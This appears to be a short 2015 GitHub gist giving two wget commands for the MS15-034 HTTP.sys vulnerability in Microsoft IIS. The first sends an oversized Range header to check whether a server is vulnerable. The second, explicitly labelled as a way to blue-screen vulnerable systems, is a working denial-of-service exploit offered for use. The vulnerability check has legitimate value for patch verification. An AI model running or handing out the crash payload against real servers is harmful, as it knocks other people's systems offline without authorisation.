Skip to content

Instantly share code, notes, and snippets.

@jgamblin
Created April 16, 2015 01:48
Show Gist options
  • Star 4 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
  • Save jgamblin/78385829c9922b4b465d to your computer and use it in GitHub Desktop.
Save jgamblin/78385829c9922b4b465d to your computer and use it in GitHub Desktop.
Test for MS15-034 with WGET
#Use this just to test (Requested Range Not Satisfiable = vulnerable):
wget --header="Range: bytes=0-18446744073709551615" http://serveraddress/iis-85.png
#Use this to BSOD Vulnerable systems:
wget --header="Range: bytes=18-18446744073709551615" http://serveraddress/iis-85.png
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment